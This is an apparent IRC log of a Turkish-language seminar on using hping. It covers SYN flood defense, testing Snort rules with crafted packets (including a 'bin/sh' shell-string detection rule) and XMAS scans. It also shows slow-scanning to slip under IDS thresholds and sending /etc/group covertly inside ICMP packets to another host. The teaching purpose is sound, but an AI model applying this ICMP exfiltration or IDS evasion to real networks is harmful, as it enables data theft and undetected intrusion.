saniyede bilmem kac syn alirsan "hoooopp" diyecek bi sistemleri yokmu huzeyfe_onal acik olursa gonderilen syn paketleri icin syn ack cevabi gonderip bir muddet bekleyecek[22:29-07/13] huzeyfe_onal hepsi farkli iplerden geliyor isteklerin. alee ama ayni porta huzeyfe_onal o zaman adam amacina ulasmis olur huzeyfe_onal gercekten o porta ulasmak isteyenlerde ulasamaz alee oda dogru ya -------------------------------------------------------------------------------------------------- Soru: talkieee microsoft / google / yahoo gibi devler ne yapiyor? stateful firewall mi alee talkieee supersin huzeyfe_onal benim evdeki firewallumda statefull :) huzeyfe_onal yani olmayan yok huzeyfe_onal ama syn flood'u engellemenin cesitli yollari var. talkieee engelliyomu stateful yani ? huzeyfe_onal tam degil.[22:31-07/13] huzeyfe_onal yani stateful olmasi cok onemli degil. huzeyfe_onal her halukarda gelen syn paketlerini incelemeye alacak ve cevap donecek. -------------------------------------------------------------------------------------------------- huzeyfe_onal IDS/IPS Testlerinde Hping Kullanımı huzeyfe_onal konusuna geciyoruz ... huzeyfe_onal ids nasil test edilir? huzeyfe_onal ids uzerinde yuklu kurallari ids'e gondererek:) huzeyfe_onal en saglikli test budur. huzeyfe_onal bunun icin Ftester cok ise yarar huzeyfe_onal ama hping'de asagi kalmaz huzeyfe_onal neyse isimiz hping ile huzeyfe_onal mesela klasik hping taramasini bir ids nasil gorur huzeyfe_onal [**] [1:524:8] BAD-TRAFFIC tcp port 0 traffic [**] huzeyfe_onal [Classification: Misc activity] [Priority: 3] huzeyfe_onal 07/12-20:08:00.723275 192.168.1.5:1222 -> 192.168.1.4:0 huzeyfe_onal TCP TTL:64 TOS:0x0 ID:966 IpLen:20 DgmLen:40 huzeyfe_onal ******** Seq: 0x3D69F7AB Ack: 0x41DBBD11 Win: 0x200 TcpLen: 20 huzeyfe_onal hedef sistemin 0. TCP portuna geliyor istek. huzeyfe_onal gectik[22:34-07/13] huzeyfe_onal mesela exptest dosyasinda ids'i test edeek bir imza olsun huzeyfe_onal # more exptest huzeyfe_onal GET /scripts/slxweb.dll/view?name=mainpage HTTP/1.0 huzeyfe_onal boyle bir HTTP paketi gordugunde ids bagiriyor olsun. huzeyfe_onal # hping -P 192.168.1.3 -d 100 -p 80 -E exptest -c 1 huzeyfe_onal -E ile dosyanin icerigini hedef sisteme gondeririz. huzeyfe_onal ids de tanimli bir imza ise bagirir. huzeyfe_onal baska , daha gercekci bir ornek verelim. huzeyfe_onal Aşağıdaki gibi bir Snort kuralımız olsun [22:36-07/13] huzeyfe_onal alert tcp $EXTERNAL_NET any -> $TELNET_SERVERS 23 (msg:"TELNET xyz exploit attempt"; flow:to_server; content:"bin/sh"; classtype:she huzeyfe_onal llcode-detect; sid:1430; rev:7;) huzeyfe_onal yani telnet oturumunda bin/sh stringi gecerse ids yakalasin ve uyari versin. huzeyfe_onal # cat snort_test huzeyfe_onal bin/sh huzeyfe_onal snort_test dosyasinda bir satirlik bin/sh yazisi var huzeyfe_onal biz bunu hedef sisteme gondererek ids'imizin kuralini test edecegiz.[22:37-07/13] huzeyfe_onal # hping -n -c 1 -P 192.168.1.4 -p 23 -d 50 -E snort_test huzeyfe_onal -d ile gonderilecek dosyanin boyutu belirlenir, -E ile dosyanin icerigi gonderilir. huzeyfe_onal -P TCP deki PUSH bayragı veri aktarimi icin huzeyfe_onal --- 192.168.1.4 hping statistic --- huzeyfe_onal 1 packets tramitted, 0 packets received, 100% packet loss huzeyfe_onal round-trip min/avg/max = 0.0/0.0/0.0 ms huzeyfe_onal simdi de Snort loglarina bakalim.[22:38-07/13] huzeyfe_onal [**] [1:1430:7] TELNET xyz exploit attempt [**] huzeyfe_onal [Classification: Executable code was detected] [Priority: 1] huzeyfe_onal 07/12-21:53:46.758684 192.168.1.5:2445 -> 192.168.1.4:23 huzeyfe_onal TCP TTL:64 TOS:0x0 ID:49841 IpLen:20 DgmLen:90 huzeyfe_onal ****P*** Seq: 0x16AB9A80 Ack: 0x37A74B05 Win: 0x200 TcpLen: 20 huzeyfe_onal aynen dedigimiz gibi saldiri girisimini yakaladi/engelledi. huzeyfe_onal TELNET xyz exploit attempt huzeyfe_onal kurali yazarken bu saldiriyi yakaladiginda msg:"TELNET xyz exploit attempt" mesaji versin demistik. huzeyfe_onal Br ornek de Port taramalari ile ids'imizin kurallarini test edelim.[22:39-07/13] huzeyfe_onal Mesela saldirganın XMAS Scan yaptığını düşünelim. Eğer IDS sisteminiz düzgün yapılandırılmışsa bu saldırı tipini rahatlıkla tanıyacaktır. huzeyfe_onal #hping -FUP -n -p 22 192.168.1.4 -c 2 huzeyfe_onal HPING 192.168.1.4 (eth0 192.168.1.4): FPU set, 40 headers + 0 data bytes huzeyfe_onal Snort’a düşen loglara bakalim. huzeyfe_onal # tail -f /var/log/snort/alert huzeyfe_onal **U*P**F Seq: 0x5DDA5952 Ack: 0x3220A1A8 Win: 0x200 TcpLen: 20 UrgPtr: 0x0 huzeyfe_onal [Xref => http://www.whitehats.com/info/IDS30] huzeyfe_onal [**] [1:1228:7] SCAN nmap XMAS [**] huzeyfe_onal [Classification: Attempted Information Leak] [Priority: 2] huzeyfe_onal 07/12-20:41:07.953181 192.168.1.5:2165 -> 192.168.1.4:22 huzeyfe_onal TCP TTL:64 TOS:0x0 ID:47151 IpLen:20 DgmLen:40 huzeyfe_onal **U*P**F Seq: 0x6C47BC04 Ack: 0x736BEDAF Win: 0x200 TcpLen: 20 UrgPtr: 0x0 huzeyfe_onal [Xref => http://www.whitehats.com/info/IDS30] huzeyfe_onal SCAN nmap XMAS [**] huzeyfe_onal hemen tanidi:)[22:40-07/13] huzeyfe_onal soru var mi? huzeyfe_onal Hping ile Dosya Transferi konusuna gecip bitirecegim huzeyfe_onal hping --rand-source kanal :) -------------------------------------------------------------------------------------------------- Soru: talkieee 1. port taramalarini engellemenin etkili yolu ne 2. syn flood engellemenin etk. yolu ne talkieee sayin hocam huzeyfe_onal isini bilen birinin yapacagi port taramalari *engellenemez*. [22:42-07/13] talkieee isini bilmeyenlerinki ? alee bu isi bilenleride hicbisi engellemiyo canim huzeyfe_onal acemi tarayicilarin yapacagi taramalari ids sistemleri ile engellenebilir. huzeyfe_onal mesela huzeyfe_onal Snort'da su sekilde AliAkgun iþini bilen biri nasýl bir mantýkla yapýyor :)[22:43-07/13] huzeyfe_onal bir confla yakalaybilirsiniz. talkieee heralde spoofingle huzeyfe_onal snort.conf'da huzeyfe_onal scan_type { portscan portsweep decoy_portscan distributed_portscan all } huzeyfe_onal ile hangi tarama turlerini izleyeceginiz belirtilir huzeyfe_onal sonra gelen istegin port tarama mi normal bir istek mi olacagina karar vermek icin[22:44-07/13] huzeyfe_onal threshold degerleri belirlenir. huzeyfe_onal boylece normal istekler ile port taramalar ayirtedilebilir huzeyfe_onal yoksa ids'ler kendilerinden anlamazlar boyle birseyi. huzeyfe_onal syn scan engelleme icin huzeyfe_onal populer yontem huzeyfe_onal syn_cookie kullanimi talkieee AliAkgun sordugu soru ? bende merak ediyorum..[22:45-07/13] huzeyfe_onal detaylarini cok iyi bilmiyorum ama gercek bir flood'da cok fayda vermiyor(tecrube ile sabit) huzeyfe_onal isini bilen biri taradigi sistemin admininden daha iyi taniyor o sistemleri:) huzeyfe_onal hangi ids, hangi fw var nasil calsiiyor, ben nasil paketler gonderirsem yer huzeyfe_onal mesela soyle dusunelim[22:46-07/13] huzeyfe_onal ayni anda bir ip den 10'dan fazla istek gelirse IDS/IPS bunu port tarama kabul etsin huzeyfe_onal ben de aynı anda 10 paket değil 2 ser paket 3 er paket gonderirim talkieee :D huzeyfe_onal biraz yavas olur ama amacima ulasirim huzeyfe_onal diger turlu sistem banlar beni.[22:47-07/13] -------------------------------------------------------------------------------------------------- huzeyfe_onal Hping ile Dosya Transferi huzeyfe_onal konusuna geciyoruz huzeyfe_onal on soru: huzeyfe_onal tcp kullanarak veri transferi yapmak icin ne gereklidir? huzeyfe_onal ccna kursuna gidenler bir ezberden soylesin bakalim:) [22:48-07/13] huzeyfe_onal tcp de veri aktarimi yapilmadan once oturum kurulmasi gerekir denir huzeyfe_onal hping kullanarak ip/icmp/tcp/udp uzerinden veri transferi yapabiliriz. huzeyfe_onal yani masum ping paketleri aslinda sirketinizden gizli verileri kaciriyor olabilir:D[22:50-07/13] huzeyfe_onal mesela Mesela bir hosttan diğerine /etc/group dosyasını icmp ile gönderelim. huzeyfe_onal Gönderici Host huzeyfe_onal da #hping --icmp 192.168.1.4 -d 200 --sign huzeyfe --file /etc/group huzeyfe_onal komutunu verelim huzeyfe_onal bu komut huzeyfe_onal /etc/group dosyasini 192.168.1.4 'e huzeyfe on eki ile gonderiyor -------------------------------------------------------------------------------------------------- Soru: talkieee --sign huzeyfe parametresi ne is yapiyor? huzeyfe_onal> huzeyfe'yi bir nevi parola, tanitici gibi dusunebilirsiniz. huzeyfe_onal alici taraf dosyayi bu ekle taniyacak:D -------------------------------------------------------------------------------------------------- Soru: Cronist -d 200 ne icin? huzeyfe_onal gonderielcek veri boyutunu belirtiyoruz huzeyfe_onal max bu degerde diye huzeyfe_onal :D -------------------------------------------------------------------------------------------------- huzeyfe_onal Dinleyici taraf huzeyfe_onal da nasil bir komut verelim huzeyfe_onal # hping --icmp 192.168.1.4 --listen huzeyfe[22:52-07/13] huzeyfe_onal Arada geçen trafiğe ait Tcpdump çıktısı huzeyfe_onal 2007-07-05 22:24:20.333750 IP 192.168.1.4 > 192.168.1.4: ICMP echo request, id 29022, seq 6144, length 208 huzeyfe_onal 0x0000: 4500 00e4 b8da 0000 4001 3de6 c0a8 0104 E.......@.=..... huzeyfe_onal 0x0010: c0a8 0104 0800 900e 715e 1800 6875 7a65 ........q^..huze huzeyfe_onal 0x0020: 7966 6572 6f6f 743a 3a30 3a72 6f6f 740a yferoot::0:root. huzeyfe_onal 0x0030: 6269 6e3a 3a31 3a72 6f6f 742c 6269 6e2c bin::1:root,bin, huzeyfe_onal 0x0040: 6461 656d 6f6e 0a64 6165 6d6f 6e3a 3a32 daemon.daemon::2 huzeyfe_onal